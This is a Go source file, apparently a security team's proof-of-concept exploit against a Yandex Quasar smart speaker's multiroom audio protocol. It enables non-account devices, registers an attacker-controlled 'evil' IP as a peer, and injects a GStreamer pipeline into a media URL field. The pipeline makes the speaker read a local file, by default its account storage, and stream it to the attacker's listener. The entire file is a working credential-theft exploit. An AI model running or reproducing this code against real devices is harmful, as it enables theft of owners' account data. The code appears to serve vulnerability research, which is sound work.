package main

import (
	"bytes"
	"context"
	"encoding/binary"
	"flag"
	"fmt"
	"io"
	"log"
	"net"
	"os"
	"os/signal"
	"syscall"
	"time"

	"github.com/gofrs/uuid"
	"github.com/golang/protobuf/proto"

	"a.yandex-team.ru/security/pocs/quasar/multiaudio/qrpc"
)

var (
	deviceID = fmt.Sprintf("bogus-%s", uuid.Must(uuid.NewGen().NewV4()))
)

type IPC struct {
	conn *net.TCPConn
}

func (i *IPC) Read() (*qrpc.QuasarMessage, error) {
	rawSize := make([]byte, 4)
	_, err := io.ReadFull(i.conn, rawSize)
	if err != nil {
		return nil, err
	}

	msgSize := binary.LittleEndian.Uint32(rawSize)
	var buf bytes.Buffer
	if _, err := io.CopyN(&buf, i.conn, int64(msgSize)); err != nil {
		return nil, err
	}

	msg := new(qrpc.QuasarMessage)
	err = proto.Unmarshal(buf.Bytes(), msg)
	if err != nil {
		log.Printf("received msg (%s -> %s): %v\n", i.conn.LocalAddr(), i.conn.RemoteAddr(), msg)
	}
	return msg, err
}

func (i *IPC) Write(msg *qrpc.QuasarMessage) error {
	rawMsg, err := proto.Marshal(msg)
	if err != nil {
		return err
	}

	log.Printf("sending msg (%s -> %s): %v\n", i.conn.LocalAddr(), i.conn.RemoteAddr(), msg)

	rawSize := make([]byte, 4)
	binary.LittleEndian.PutUint32(rawSize, uint32(len(rawMsg)))

	_, err = i.conn.Write(append(rawSize, rawMsg...))
	return err
}

func (i *IPC) Close() {
	_ = i.conn.Close()
}

func exit(msg string, args ...interface{}) {
	_, _ = fmt.Fprintf(os.Stderr, msg+"\n", args...)
	os.Exit(1)
}

func clientConn(targetIP string) (*net.TCPConn, error) {
	tcpAddr, err := net.ResolveTCPAddr("tcp", fmt.Sprintf("%s:11124", targetIP))
	if err != nil {
		return nil, fmt.Errorf("can't parse target IP %q: %v", targetIP, err)
	}

	conn, err := net.DialTCP("tcp", nil, tcpAddr)
	if err != nil {
		return nil, fmt.Errorf("dial failed: %v", err)
	}

	return conn, nil
}

func startReceiverSrv(ctx context.Context, ip string) error {
	var lc net.ListenConfig
	l, err := lc.Listen(ctx, "tcp", fmt.Sprintf("%s:11123", ip))
	if err != nil {
		return err
	}

	log.Printf("receiver server started at: %s\n", l.Addr().String())

	handleConnection := func(c net.Conn) {
		defer func() { _ = c.Close() }()

		fmt.Printf("-----YAY!! (client: %s)-----", c.RemoteAddr())
		_, _ = io.Copy(os.Stdout, c)
	}

	go func() {
		for {
			c, err := l.Accept()
			if err != nil {
				log.Printf("accept failed: %v\n", err)
				return
			}

			go handleConnection(c)
		}
	}()
	return nil
}

func startBogusMultiroomSrv(ctx context.Context, ip, localPath string) error {
	var lc net.ListenConfig
	l, err := lc.Listen(ctx, "tcp", fmt.Sprintf("%s:11124", ip))
	if err != nil {
		return err
	}

	log.Printf("bogus server started at: %s\n", l.Addr().String())

	payload := fmt.Sprintf(
		"http://not-a-kinopoisk.ru/a.mp3?%s name=lala filesrc location=%s ! tcpclientsink host=%s port=11123  lala. ! queue",
		deviceID, localPath, ip,
	)

	handleConnection := func(c net.Conn) {
		defer func() { _ = c.Close() }()

		msg := &qrpc.QuasarMessage{
			MultiroomBroadcast: &qrpc.MultiroomBroadcast{
				DeviceId:           &deviceID,
				State:              qrpc.MultiroomBroadcast_PLAYING.Enum(),
				RoomId:             proto.String("__all__"),
				SessionTimestampMs: proto.Int64(time.Now().UnixNano() / int64(time.Millisecond)),
				NetAudioClockPort:  proto.Int32(11125),
				NetAudioClockId:    proto.String("sss"),
				MultiroomParams: &qrpc.MultiroomParams{
					Url:        &payload,
					BasetimeNs: proto.Int64(1),
				},
			},
		}

		ipc := IPC{conn: c.(*net.TCPConn)}
		if err := ipc.Write(msg); err != nil {
			log.Printf("can't write bogus msg: %v\n", err)
			return
		}

		_, _ = ipc.Read()
	}

	go func() {
		for {
			c, err := l.Accept()
			if err != nil {
				log.Printf("accept failed: %v\n", err)
				return
			}

			handleConnection(c)
			_ = l.Close()
			return
		}
	}()
	return nil
}

func allowNonAccount(targetIP string) error {
	cc, err := clientConn(targetIP)
	if err != nil {
		return err
	}

	ipc := IPC{conn: cc}
	defer ipc.Close()

	if _, err := ipc.Read(); err != nil {
		return err
	}

	cfg := `{"allow_non_account_device": true}`
	msg := &qrpc.QuasarMessage{
		MultiroomDirective: &qrpc.MultiroomDirective{
			Config: &qrpc.MultiroomDirective_Config{
				Json: proto.String(cfg),
			},
		},
	}

	return ipc.Write(msg)
}

func addBogusSrv(targetIP, evilIP string) error {
	cc, err := clientConn(targetIP)
	if err != nil {
		return err
	}

	ipc := IPC{conn: cc}
	defer ipc.Close()

	if _, err := ipc.Read(); err != nil {
		return err
	}

	msg := &qrpc.QuasarMessage{
		MultiroomState: &qrpc.MultiroomState{
			IpAddress: &evilIP,
			DeviceId:  &deviceID,
		},
	}

	return ipc.Write(msg)
}

func main() {
	var (
		targetIP  string
		evilIP    string
		localpath string
	)
	flag.StringVar(&targetIP, "target", "", "target ip")
	flag.StringVar(&evilIP, "evil", "", "custom multiroom ip")
	flag.StringVar(&localpath, "path", "/data/quasar/account_storage.dat", "filepath to retrieve")
	flag.Parse()

	if targetIP == "" {
		exit("empty --target")
	}

	if evilIP == "" {
		exit("empty --evil")
	}

	ctx, cancel := context.WithCancel(context.Background())
	defer cancel()

	handleErr := func(err error) {
		cancel()
		exit(err.Error())
	}

	log.Println("starting recv srv")
	if err := startReceiverSrv(ctx, evilIP); err != nil {
		handleErr(err)
	}

	log.Println("starting bogus srv")
	if err := startBogusMultiroomSrv(ctx, evilIP, localpath); err != nil {
		handleErr(err)
	}

	log.Println("setting allow_non_account_device")
	if err := allowNonAccount(targetIP); err != nil {
		handleErr(err)
	}

	log.Println("add bogus src as multiroom peer")
	if err := addBogusSrv(targetIP, evilIP); err != nil {
		handleErr(err)
	}

	stopChan := make(chan os.Signal, 1)
	signal.Notify(stopChan, syscall.SIGINT, syscall.SIGTERM)
	<-stopChan
	cancel()
}
